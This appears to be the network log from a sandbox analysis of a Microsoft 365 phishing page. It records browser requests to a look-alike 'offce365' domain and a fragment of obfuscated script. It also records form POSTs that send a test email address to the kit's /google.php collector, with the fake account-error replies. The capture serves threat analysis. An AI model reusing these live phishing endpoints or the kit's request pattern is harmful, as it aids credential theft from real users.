                                                                                        Data Ascii: 7b)+_0x27ef6c(0x4d0)+_0x27ef6c(0x12de)+_0x27ef6c(0xc1f)+_0x27ef6c(0x1961)+_0x27ef6c(0xaf5)+_0x27ef6c(0xd91)+_0x27ef6c(0x1b7f)+_0x27ef6c(0x1522)+_0x27ef6c(0x23bd)+_0x27ef6c(0x12de)+_0x27ef6c(0x1e30)+_0x27ef6c(0x7db)+_0x27ef6c(0x1cf9)+_0x27ef6c(0x268b)+_0x2


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.1649747104.21.59.54436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:26 UTC679OUTPOST /google.php HTTP/1.1
                                                                                        Host: ydpj.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 13
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:26 UTC13OUTData Raw: 64 6f 3d 75 73 65 72 2d 63 68 65 63 6b
                                                                                        Data Ascii: do=user-check
                                                                                        2025-03-24 04:00:31 UTC980INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:31 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        Access-Control-Allow-Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Max-Age: 86400
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iWf2Z8KlraJ3od8K5wOBVlBmjnm1DJFOsxajGrr8kmicuzYd0DEpcgBcRnscnfXgMB1OR2Nuys4FRYzPeZoUMlIDfm1oXaZQ2MrekZMGKXd1%2BtVPyntYVkH4TneajLtDS1i%2BcCwDbicFdDxylBCZ4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925342f47d178c73-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=96575&min_rtt=96306&rtt_var=20552&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2865&recv_bytes=1286&delivery_rate=38660&cwnd=238&unsent_bytes=0&cid=2da9b6409e53ad9e&ts=5329&x=0"
                                                                                        2025-03-24 04:00:31 UTC22INData Raw: 31 30 0d 0a 7b 22 73 74 61 74 75 73 22 3a 66 61 6c 73 65 7d 0d 0a
                                                                                        Data Ascii: 10{"status":false}
                                                                                        2025-03-24 04:00:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.1649746104.77.220.514436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:26 UTC718OUTGET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1
                                                                                        Host: res.cloudinary.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:26 UTC830INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 21873
                                                                                        ETag: "568f3323a159c49c955a6e9e5ce8ac4d"
                                                                                        Last-Modified: Sat, 15 Mar 2025 15:34:29 GMT
                                                                                        Date: Mon, 24 Mar 2025 04:00:26 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                        x-request-id: 66832d6d13078dacf529e15646e9e921
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Accept-Ranges: bytes
                                                                                        Timing-Allow-Origin: *
                                                                                        Server: Cloudinary
                                                                                        Strict-Transport-Security: max-age=604800
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server-Timing: cld-akam;dur=7;start=2025-03-24T04:00:26.343Z;desc=hit,rtt;dur=91,content-info;desc="width=2016,height=2016,bytes=21873,format=\"png\",o=1,crt=1742052868,ef=(17)"
                                                                                        2025-03-24 04:00:26 UTC15554INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 e0 00 00 07 e0 08 06 00 00 00 f6 b1 41 ec 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                                                                                        Data Ascii: PNGIHDRAtEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
                                                                                        2025-03-24 04:00:26 UTC6319INData Raw: 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10
                                                                                        Data Ascii: @@<x @@<x @@<x


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.1649748104.77.220.514436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:26 UTC464OUTGET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1
                                                                                        Host: res.cloudinary.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:26 UTC831INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 21873
                                                                                        ETag: "568f3323a159c49c955a6e9e5ce8ac4d"
                                                                                        Last-Modified: Sat, 15 Mar 2025 15:34:29 GMT
                                                                                        Date: Mon, 24 Mar 2025 04:00:26 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                        x-request-id: 66832d6d13078dacf529e15646e9e921
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Accept-Ranges: bytes
                                                                                        Timing-Allow-Origin: *
                                                                                        Server: Cloudinary
                                                                                        Strict-Transport-Security: max-age=604800
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server-Timing: cld-akam;dur=24;start=2025-03-24T04:00:26.928Z;desc=hit,rtt;dur=89,content-info;desc="width=2016,height=2016,bytes=21873,format=\"png\",o=1,crt=1742052868,ef=(17)"
                                                                                        2025-03-24 04:00:26 UTC15553INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 e0 00 00 07 e0 08 06 00 00 00 f6 b1 41 ec 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                                                                                        Data Ascii: PNGIHDRAtEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
                                                                                        2025-03-24 04:00:27 UTC6320INData Raw: 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00 10 10 e0 01 00 00 00 00 00 00 20 20 c0 03 00 00 00 00 00 00 40 40 80 07 00 00 00 00 00 00 80 80 00 0f 00 00 00 00 00 00 00 01 01 1e 00 00 00 00 00 00 00 02 02 3c 00 00 00 00 00 00 00 04 04 78 00 00 00 00 00 00 00 08 08 f0 00 00 00 00 00 00 00
                                                                                        Data Ascii: @@<x @@<x @@<x


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.1649749104.21.59.54436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:31 UTC403OUTGET /google.php HTTP/1.1
                                                                                        Host: ydpj.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:32 UTC839INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6RLZp%2FuACpt%2FW41ZmyPOGYNPviDrIwH9K5Q9ulP3Gjzn5SkC2SD5%2BQng8IF7dWE2DuoFtZg3gXOGd8ZghN7sWYAsXUWZh6jMj5NEfn7JdcO8rPCxSCsEGod6MM17mz7j%2FaDLv9V369VLj1sHEniFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92534317d885431c-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95412&min_rtt=95394&rtt_var=20153&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2864&recv_bytes=975&delivery_rate=39026&cwnd=234&unsent_bytes=0&cid=c9d0f9ca0d21d09c&ts=426&x=0"
                                                                                        2025-03-24 04:00:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.164975023.209.72.94436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:34 UTC713OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                        Host: aadcdn.msftauth.net
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:34 UTC612INHTTP/1.1 200 OK
                                                                                        Content-Type: image/svg+xml
                                                                                        Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                        Last-Modified: Wed, 15 Jan 2025 17:54:26 GMT
                                                                                        ETag: "0x8DD358DA72AAF33"
                                                                                        x-ms-request-id: d9dbeb0f-b01e-00e4-2876-67c4b2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=25710762
                                                                                        Date: Mon, 24 Mar 2025 04:00:34 GMT
                                                                                        Content-Length: 1864
                                                                                        Connection: close
                                                                                        Akamai-GRN: 0.8904d217.1742788834.8a2542c
                                                                                        2025-03-24 04:00:34 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.164975423.209.72.314436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:35 UTC459OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                        Host: aadcdn.msftauth.net
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:35 UTC612INHTTP/1.1 200 OK
                                                                                        Content-Type: image/svg+xml
                                                                                        Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                        Last-Modified: Wed, 15 Jan 2025 17:54:26 GMT
                                                                                        ETag: "0x8DD358DA72AAF33"
                                                                                        x-ms-request-id: d9dbeb0f-b01e-00e4-2876-67c4b2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=25710796
                                                                                        Date: Mon, 24 Mar 2025 04:00:35 GMT
                                                                                        Content-Length: 1864
                                                                                        Connection: close
                                                                                        Akamai-GRN: 0.9f04d217.1742788835.dacfa40
                                                                                        2025-03-24 04:00:35 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.1649765104.21.59.54436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:01:09 UTC737OUTPOST /google.php HTTP/1.1
                                                                                        Host: ydpj.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 29
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: application/json, text/javascript, */*; q=0.01
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:01:09 UTC29OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 61 69 6c 3d 74 65 73 74 40 67 6d 61 69 6c 2e 63 6f 6d
                                                                                        Data Ascii: do=check&email=test@gmail.com
                                                                                        2025-03-24 04:01:10 UTC985INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:01:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        Access-Control-Allow-Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Max-Age: 86400
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=04jR0fk%2FAviggc4nDa42fCV7X9bpRuAfMPUXnx3obDmsGoiauvBBPPhBQt9SQ4KA8cKBY%2F9oFfEUgFV3XNEuAWsVGCkfgtcQtX1esvM8PwIFqLX4d%2F0ZfX8%2BKZmZTbuie1MQn0UhhK88YNH%2BgEb34A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925344035d24dc28-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=97078&min_rtt=97006&rtt_var=20576&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2864&recv_bytes=1360&delivery_rate=38311&cwnd=236&unsent_bytes=0&cid=4a201bb56365cadf&ts=722&x=0"
                                                                                        2025-03-24 04:01:10 UTC105INData Raw: 36 33 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 6e 20 61 63 63 6f 75 6e 74 20 77 69 74 68 20 74 68 61 74 20 75 73 65 72 6e 61 6d 65 2e 20 54 72 79 20 61 6e 6f 74 68 65 72 20 61 63 63 6f 75 6e 74 2e 22 7d 0d 0a
                                                                                        Data Ascii: 63{"status":"error","message":"We couldn't find an account with that username. Try another account."}
                                                                                        2025-03-24 04:01:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.1649766104.21.59.54436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:01:10 UTC403OUTGET /google.php HTTP/1.1
                                                                                        Host: ydpj.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:01:10 UTC853INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:01:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sST4n%2FdT4aO%2B3RlbHEZD2SEf23n2o%2FZqIMUOJpjI7e50fQtVNimFB%2Boeaq6jC0P37ExaOVMtS5Cu%2FF%2FboRut7OjMcmf6M%2BAa6ARB8Hs%2F0zkf%2Bo%2FPcylTGyjj3HyVy71uqukGQWr%2BOWLXWMBLrtZiyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925344091acb4fb3-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=96943&min_rtt=96842&rtt_var=20596&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2863&recv_bytes=975&delivery_rate=38317&cwnd=207&unsent_bytes=0&cid=cf3e7dbc0db1f617&ts=428&x=0"
                                                                                        2025-03-24 04:01:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.1649771104.21.59.54436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:01:32 UTC737OUTPOST /google.php HTTP/1.1
                                                                                        Host: ydpj.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: application/json, text/javascript, */*; q=0.01
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
